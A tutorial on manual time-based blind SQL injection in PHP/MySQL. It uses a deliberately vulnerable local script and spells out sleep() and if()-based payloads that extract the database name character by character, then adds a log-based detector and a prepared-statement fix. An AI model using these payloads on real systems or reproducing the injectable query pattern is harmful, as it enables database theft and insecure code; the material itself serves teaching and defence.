PHP MySQL blind injection: MySQL time-based blind injection, manual injection explained

This article explains time-based blind injection in PHP/MySQL, covering its definition, the basic knowledge needed, and the manual injection steps. By varying the argument of sleep() and observing the page response time, the content of the data can be determined. A worked example shows how the first character of the database name is recovered from the time delay.

The practice environment is almost the same as for boolean-based blind injection; only the PHP code needs a small change:

<?php
/* Disable error reporting */
error_reporting(0);

/* Set the response charset header */
header("Content-type: text/html; charset=utf-8");

/* Connection details */
$host = '127.0.0.1';
$user = 'root';
$pass = 'root';
$db   = 'test';

if(@isset($_GET['name'])){
    $conn = mysqli_connect($host,$user,$pass,$db) or die('Link False');
    /* Deliberately vulnerable test target: the parameter is concatenated straight into the query */
    $sql = "SELECT * FROM user where user='".$_GET['name']."'";
    /* Echo the query back to the page so the injected SQL can be seen */
    echo "\n".$sql."\n";
    $res = mysqli_query($conn,$sql);
}else{
    echo 'sql-time.php?name=user1';
}
?>

0x00 What is time-based blind injection

Time-based blind injection means determining the content of data from how long the page takes to respond. It is typically used where the data (including boolean results) cannot be returned to the page at all, so the page output cannot be used to judge the content and the only channel left is execution time.

0x01 Basics

This part is fairly simple: it introduces one flow-control function in MySQL.

if

if(expression, true_value, false_value)

When the expression holds, the true branch is evaluated; otherwise the false branch is.

Example (screenshot in the original post, not reproduced here: if)

0x02 Manual injection

Identifying the injection point

Not much to say here; straight to the payloads. For the underlying principle, see the boolean-based blind injection write-up.

/* Integer injection */

sql-bool.php?name=user1 and sleep(5)

sql-bool.php?name=user1 and sleep(10)

/* String injection (single quote) */

sql-bool.php?name=user1' and sleep(5) and '1'='1

sql-bool.php?name=user1' and sleep(10) and '1'='2

/* String injection (double quote) */

sql-bool.php?name=user1" and sleep(5) and "1"="1

sql-bool.php?name=user1" and sleep(10) and "1"="2

To make the response time easy to read, Burp is used to send the requests.

Screenshot (not reproduced): normal request

Screenshot (not reproduced): ' and sleep(5) and '1'='1

Screenshot (not reproduced): ' and sleep(10) and '1'='1

As can be seen, a normal request responds in 2 ms; with sleep(5) the response takes about 5 seconds, and with sleep(10) about 10 seconds.

From this it can be concluded that the page is vulnerable to time-based blind injection.
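The same response-time signal that confirms the injection point is what a defender can look for in server logs. The following PHP CLI script is an added example, not part of the original post: it scans access-log lines for delay functions in the query string and for abnormally slow responses. The log format (client IP, quoted request line, status, response time in milliseconds), the sample lines and the 2000 ms threshold are all constructed for this example.

```php
<?php
// Added example (not the original post's code): flag time-based blind injection probes
// in web-server access logs. Assumed log format (constructed for this example):
//   <client ip> "<METHOD> <target> HTTP/x.y" <status> <response time in ms>

$sampleLog = [
    '10.0.0.5 "GET /sql-time.php?name=user1 HTTP/1.1" 200 2',
    '10.0.0.5 "GET /sql-time.php?name=user1%27%20and%20sleep(5)%20and%20%271%27%3D%271 HTTP/1.1" 200 5004',
    '10.0.0.5 "GET /sql-time.php?name=user1%27%20and%20if((select%20ord(substring(database(),1,1)))%20=%20116,sleep(5),1)%20and%20%271%27%3D%271 HTTP/1.1" 200 5002',
    '10.0.0.9 "GET /index.php HTTP/1.1" 200 3',
];

/**
 * Parse one log line and report why it looks like a timing probe.
 * Returns null if the line does not match the assumed format.
 */
function analyzeLogLine(string $line, int $slowMs = 2000): ?array
{
    if (!preg_match('/^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) (\d+)$/', $line, $m)) {
        return null;
    }
    [, $ip, $method, $target, $status, $ms] = $m;

    // Decode the query string so %27 / %20 style encoding cannot hide the keywords
    $query   = (string) parse_url($target, PHP_URL_QUERY);
    $decoded = strtolower(urldecode($query));

    // MySQL functions that let a request control how long the query runs
    $timingFn = preg_match('/\b(sleep|benchmark)\s*\(/', $decoded) === 1;
    // Conditional wrapper that turns a true/false test into a delay
    $conditional = preg_match('/\bif\s*\(/', $decoded) === 1;
    // Response-time outlier relative to the page's normal few milliseconds
    $slow = (int) $ms >= $slowMs;

    $reasons = [];
    if ($timingFn) {
        $reasons[] = 'timing-function';
    }
    if ($timingFn && $conditional) {
        $reasons[] = 'conditional-delay';
    }
    if ($slow) {
        $reasons[] = 'slow-response';
    }

    return [
        'ip'         => $ip,
        'path'       => parse_url($target, PHP_URL_PATH),
        'ms'         => (int) $ms,
        'suspicious' => $timingFn || $slow,
        'reasons'    => $reasons,
    ];
}

foreach ($sampleLog as $line) {
    $r = analyzeLogLine($line);
    if ($r !== null && $r['suspicious']) {
        printf("%s %s %dms -> %s\n", $r['ip'], $r['path'], $r['ms'], implode(',', $r['reasons']));
    }
}
```

Run with `php detect.php` (any file name). The second and third sample lines are reported with both a keyword and a slow-response reason; the keyword match alone is cheap to evade, so the response-time outlier is the more robust signal, and neither replaces fixing the query itself.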

Reading data

The principle is roughly the same as boolean-based blind injection, except that the boolean result cannot be returned to the page, so if() is used to trigger sleep(). Whether the expression is true or false is then judged from the response time, and from that the content of the data.

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 97,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 98,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 99,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 100,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 101,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 102,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 103,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 104,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 105,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 106,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 107,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 108,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 109,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 110,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 111,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 112,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 113,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 114,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 115,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 116,sleep(5),1) and '1'='1

For the other values, the page responds in about 3 ms.

Screenshot (not reproduced): other values

When testing equality with 116, the page takes about 5 seconds to respond.

Screenshot (not reproduced): 116

So the first character of the database name is t (ASCII 116).

The remaining characters follow the same pattern.
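The whole procedure above works only because the name parameter is spliced into the SQL text. As an added example, not the original post's code, here is the same sql-time.php endpoint rewritten with a mysqli prepared statement so the parameter is bound as data. Table name, column name and the local connection values are taken from the post's test script; the max_execution_time statement assumes MySQL 5.7.8 or later, where that session variable (in milliseconds) caps how long a SELECT may run.

```php
<?php
// Added example (not the original post's code): hardened version of sql-time.php.
// Connection values, table and column follow the post's test environment.
error_reporting(0);
header("Content-type: text/html; charset=utf-8");

$host = '127.0.0.1';
$user = 'root';
$pass = 'root';
$db   = 'test';

if (!isset($_GET['name'])) {
    echo 'sql-time.php?name=user1';
    exit;
}

$conn = mysqli_connect($host, $user, $pass, $db) or die('Link False');

// Defence in depth (assumes MySQL 5.7.8+): cap SELECT run time at 1000 ms so a
// delay-based probe cannot hold the connection for seconds even if a query slipped through.
mysqli_query($conn, 'SET SESSION max_execution_time = 1000');

// The query text is fixed; the driver fills the placeholder, nothing is concatenated.
$stmt = mysqli_prepare($conn, 'SELECT * FROM user WHERE user = ?');
mysqli_stmt_bind_param($stmt, 's', $_GET['name']);
mysqli_stmt_execute($stmt);
$res = mysqli_stmt_get_result($stmt);

// With the post's probe (name=user1' and if(...,sleep(5),1) and '1'='1) MySQL now
// compares the user column against that entire string: no row matches, sleep() never
// runs, and the response time carries no information about the data.
while ($row = mysqli_fetch_assoc($res)) {
    echo htmlspecialchars($row['user'], ENT_QUOTES, 'UTF-8'), "\n";
}
mysqli_stmt_close($stmt);
mysqli_close($conn);
?>
```

The same change neutralises the boolean-based variant and the sleep()-only injection-point checks earlier in the post, since in every case the injected text is no longer parsed as SQL.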
